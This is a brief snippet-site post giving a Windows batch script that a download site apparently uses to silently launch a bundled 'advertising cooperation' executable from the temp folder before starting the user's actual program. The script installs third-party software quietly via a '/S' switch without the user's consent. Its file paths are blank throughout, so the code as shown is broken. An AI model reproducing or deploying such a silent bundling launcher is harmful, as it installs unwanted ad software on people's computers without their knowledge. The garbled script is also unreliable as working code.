SoFunction
Updated on 2025-04-08

The download site runs the advertising cooperation exe file and then runs the bat of the program file


@ECHO OFF
if not exist ".\" GOTO END
move ".\" "%temp%\"
start "qq" "%temp%\" "/S"
:END
start "m" ".\bin\"
exit